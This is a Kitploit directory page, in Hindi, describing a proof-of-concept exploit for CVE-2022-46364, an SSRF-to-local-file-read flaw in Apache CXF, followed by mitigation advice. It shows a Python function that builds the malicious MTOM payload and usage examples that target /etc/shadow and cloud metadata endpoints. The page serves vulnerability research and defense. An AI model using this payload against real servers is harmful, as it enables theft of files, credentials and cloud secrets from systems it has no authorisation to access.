Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-46364-Proof-of-the-concept — यह भेद्यता एक हमलावर को Apache CXF वेबसेवाओं पर SSRF (सर्वर-साइड रिक्वेस्ट फोर्जरी) हमले करने की अनुमति देती है जो MTOM/XOP अनुरोधों को स्वीकार करती हैं। समस्या xop:Include के href विशेषता को पार्स करने के तरीके में मौजूद है, जिससे सर्वर द्वारा मनमाने URL का अनुरोध किया जा सकता है। | Kitploit
उपकरण/GitHubGitHub/cybermaksx/cve-2022-46364-proof-of-the-concept
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcybermaksx/cve-2022-46364-proof-of-the-concept

CVE-2022-46364-Proof-of-the-concept

रिपॉजिटरी देखें
226 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

यह भेद्यता एक हमलावर को Apache CXF वेबसेवाओं पर SSRF (सर्वर-साइड रिक्वेस्ट फोर्जरी) हमले करने की अनुमति देती है जो MTOM/XOP अनुरोधों को स्वीकार करती हैं। समस्या xop:Include के href विशेषता को पार्स करने के तरीके में मौजूद है, जिससे सर्वर द्वारा मनमाने URL का अनुरोध किया जा सकता है।

साझा करें

CVE-2022-46364: Apache CXF MTOM XOP:Include SSRF से LFI शोषण

⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है

यह प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है ताकि सुरक्षा पेशेवर इस भेद्यता को समझ सकें और अपने सिस्टम की सुरक्षा कर सकें। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस टूल के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है। परीक्षण से पहले आपको सिस्टम स्वामी से स्पष्ट लिखित अनुमति प्राप्त करनी होगी। इस टूल का उपयोग करके, आप सभी लागू कानूनों का पालन करने के लिए सहमत होते हैं।


📋 विषय-सूची

  1. अवलोकन
  2. भेद्यता विवरण
  3. तकनीकी गहन विश्लेषण
  4. एक्सप्लॉइट उपयोग
  5. स्थापना और आवश्यकताएँ
  6. शमन
  7. संदर्भ और श्रेय

📌 अवलोकन

विशेषतामान
CVE IDCVE-2022-46364
GHSA IDGHSA-x3x3-qwjq-8gj4
भेद्यता प्रकारसर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) → लोकल फाइल इन्क्लूज़न (LFI)
प्रभावित सॉफ़्टवेयरApache CXF < 3.5.5, Apache CXF < 3.4.10
गंभीरताक्रिटिकल
CVSS स्कोर9.8 (क्रिटिकल)
आक्रमण वेक्टरनेटवर्क
प्रमाणीकरणकोई आवश्यक नहीं
पैच संस्करणApache CXF 3.5.5+, 3.4.10+

यह एक्सप्लॉइट Apache CXF के MTOM (मैसेज ट्रांसमिशन ऑप्टिमाइज़ेशन मैकेनिज़्म) कार्यान्वयन में एक गंभीर SSRF भेद्यता का लाभ उठाकर लोकल फाइल इन्क्लूज़न (LFI) और आंतरिक नेटवर्क स्कैनिंग क्षमताएँ प्राप्त करता है।


🔬 भेद्यता विवरण

मुख्य समस्या

Apache CXF, MTOM-एन्कोडेड SOAP संदेशों को संसाधित करते समय xop:Include तत्वों के भीतर href विशेषता को गलत तरीके से सत्यापित करता है। लाइब्रेरी URI को डीरेफ़रेंस करने के लिए Java के URLConnection का उपयोग करती है, बिना उचित प्रोटोकॉल प्रतिबंधों के, जिससे हमलावर निम्नलिखित निर्दिष्ट कर सकते हैं:

  • file:// - स्थानीय फ़ाइलें पढ़ना (LFI)
  • http:// / https:// - आंतरिक नेटवर्क अनुरोध (SSRF)
  • ftp:// - FTP अनुरोध (आगे शोषण की संभावना)

यह क्यों महत्वपूर्ण है

यह भेद्यता विशेष रूप से खतरनाक है क्योंकि:

  1. कोई प्रमाणीकरण आवश्यक नहीं - हमलावर किसी भी सुलभ SOAP एंडपॉइंट को लक्षित कर सकते हैं
  2. कोई विशेष विशेषाधिकार आवश्यक नहीं - सर्वर अपने स्वयं के विशेषाधिकारों के साथ अनुरोध निष्पादित करता है
  3. सूचना प्रकटीकरण - क्लाउड मेटाडेटा (AWS, GCP, Azure), कॉन्फ़िगरेशन फ़ाइलें और सोर्स कोड उजागर कर सकता है
  4. नेटवर्क पिवोटिंग - कमजोर सर्वर आंतरिक नेटवर्क टोही के लिए प्रॉक्सी बन जाता है

प्रभावित कॉन्फ़िगरेशन

कोई भी Apache CXF तैनाती जो:

  • MTOM-एन्कोडेड SOAP संदेश स्वीकार करती है
  • कम से कम एक वेब सेवा विधि (किसी भी प्रकार के पैरामीटर के साथ) रखती है
  • मुख्य शाखा के 3.5.5 या विरासत शाखा के 3.4.10 से पहले के संस्करणों का उपयोग करती है

🧠 तकनीकी गहन विश्लेषण

प्रोटोकॉल पृष्ठभूमि: MTOM और XOP

MTOM (मैसेज ट्रांसमिशन ऑप्टिमाइज़ेशन मैकेनिज़्म) SOAP संदेशों में बाइनरी डेटा ट्रांसमिशन को अनुकूलित करने के लिए एक W3C मानक है। यह बाइनरी डेटा संदर्भों को शामिल करने के लिए XOP (XML-बाइनरी ऑप्टिमाइज़्ड पैकेजिंग) का उपयोग करता है:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <myData>
            <xop:Include href="cid:[email protected]" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </myData>
    </soap:Body>
</soap:Envelope>

सामान्यतः, href में MIME भाग के लिए एक CID (कंटेंट-आईडी) संदर्भ होता है। हालाँकि, Apache CXF की AttachmentUtil क्लास href मानों को बिना उचित सैनिटाइज़ेशन के सामान्य URI के रूप में संसाधित करती है।

कमजोर कोड पथ

  1. अनुरोध पार्सिंग:

    • CXF Content-Type: application/xop+xml के साथ एक multipart/related HTTP अनुरोध प्राप्त करता है
    • AttachmentUtil.getAttachmentObject() xop:Include तत्वों को संसाधित करता है
  2. URI डीरेफ़रेंसिंग:

    • कमजोर विधि सीधे new URL(href).openStream() को कॉल करती है
    • कोई file:// प्रोटोकॉल अवरोधन नहीं होता
    • कोई नेटवर्क प्रतिबंध नहीं होता (जैसे, आंतरिक IP श्रेणियों के विरुद्ध कोई सत्यापन नहीं)
  3. प्रतिक्रिया एम्बेडिंग:

    • प्राप्त सामग्री Base64-एन्कोडेड होती है और SOAP प्रतिक्रिया में एम्बेड की जाती है
    • हमलावर को डेटा SOAP लिफाफे में प्राप्त होता है

कोड स्निपेट (कमजोर पैटर्न)

// Simplified representation of vulnerable code in CXF < 3.5.5
public DataHandler getAttachmentObject(String href) {
    URL url = new URL(href);  // No protocol validation!
    return new DataHandler(url.openStream());
}

LFI क्यों काम करता है

file:// प्रोटोकॉल उसी कोड पथ का अनुसरण करता है:

  • file:///etc/passwd → Java /etc/passwd को एक फ़ाइल स्ट्रीम के रूप में खोलता है
  • फ़ाइल सामग्री अनुलग्नक के रूप में लौटाई जाती है
  • CXF प्रक्रिया उपयोगकर्ता की अनुमतियों से परे कोई फ़ाइलसिस्टम प्रतिबंध नहीं होते

नेटवर्क स्कैनिंग क्षमता

IP और पोर्ट के माध्यम से पुनरावृत्ति करके, हमलावर यह कर सकते हैं:

  • आंतरिक सेवाओं की खोज करना
  • क्लाउड मेटाडेटा एंडपॉइंट्स (169.254.169.254) तक पहुँचना
  • नेटवर्क विभाजन नियंत्रणों को बायपास करना

🛠️ एक्सप्लॉइट उपयोग

कमांड सिंटैक्स

usage: exploit.py [-h] -t TARGET [-e ENDPOINT] [-u URL] [-f FILE] [-s SCAN]

CVE-2022-46364 Apache CXF SSRF to LFI Exploit - Educational Purpose Only

options:
  -h, --help            Show this help message and exit
  -t TARGET, --target TARGET
                        Target base URL (e.g., http://192.168.1.100:8080)
  -e ENDPOINT, --endpoint ENDPOINT
                        Web service endpoint path (default: /services/Service)
  -u URL, --url URL     External URL for SSRF (e.g., http://169.254.169.254/latest/meta-data/)
  -f FILE, --file FILE  Local file path for LFI (e.g., /etc/passwd, C:\\Windows\\win.ini)
  -s SCAN, --scan SCAN  Scan internal network range in CIDR notation (e.g., 192.168.1.0/24)

तर्कों की व्याख्या

तर्कविवरणउदाहरण
-t, --targetआवश्यक। लक्षित Apache CXF सेवा का आधार URLhttp://10.10.10.50:8080
-e, --endpointवैकल्पिक। SOAP एंडपॉइंट पथ/services/UserManagement
-u, --urlSSRF के माध्यम से प्राप्त करने के लिए HTTP/HTTPS URLhttp://169.254.169.254/latest/user-data
-f, --fileLFI के माध्यम से पढ़ने के लिए स्थानीय फ़ाइल पथ/etc/shadow, C:\ProgramData\secret.txt

📦 स्थापना और आवश्यकताएँ

पूर्वापेक्षाएँ

# Python 3.6 or higher required
python --version

स्थापना चरण

# Clone the repository
git clone https://github.com/cybermaksxx/CVE-2022-46364-Proof-of-the-concept
cd CVE-2022-46364-PoC

### requirements

requests>=2.28.0 urllib3>=1.26.0


---



### मुख्य कार्यान्वयन विवरण

#### 1. MTOM पेलोड निर्माण
```python
def create_mtom_payload(uri):
    """Create a multipart/related MTOM message with xop:Include"""
    soap_part = f"""--MIME_BOUNDARY
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: binary

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <vulnerableParam>
            <xop:Include href="{uri}" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </vulnerableParam>
    </soap:Body>
</soap:Envelope>
--MIME_BOUNDARY--"""
    return soap_part

🛡️ शमन

आधिकारिक समाधान

पैच किए गए संस्करण में अपग्रेड करें:

<!-- For Maven projects -->
<dependency>
    <groupId>org.apache.cxf</groupId>
    <artifactId>cxf-rt-frontend-jaxws</artifactId>
    <version>3.5.5</version> <!-- or 3.4.10 for legacy -->
</dependency>

वर्कअराउंड (यदि पैचिंग संभव नहीं है)

  1. MTOM को पूरी तरह अक्षम करें (यदि आवश्यक नहीं है):

    <jaxws:endpoint ...>
        <jaxws:properties>
            <entry key="mtom-enabled" value="false"/>
        </jaxws:properties>
    </jaxws:endpoint>
    
  2. नेटवर्क-स्तरीय नियंत्रण:

    • CXF अनुप्रयोग सर्वर से बाहरी कनेक्शन प्रतिबंधित करें
    • एप्लिकेशन स्तर से आंतरिक IP श्रेणियों तक पहुँच रोकने के लिए फ़ायरवॉल का उपयोग करें
    • ईग्रेस फ़िल्टरिंग लागू करें
टूल डाउनलोड करें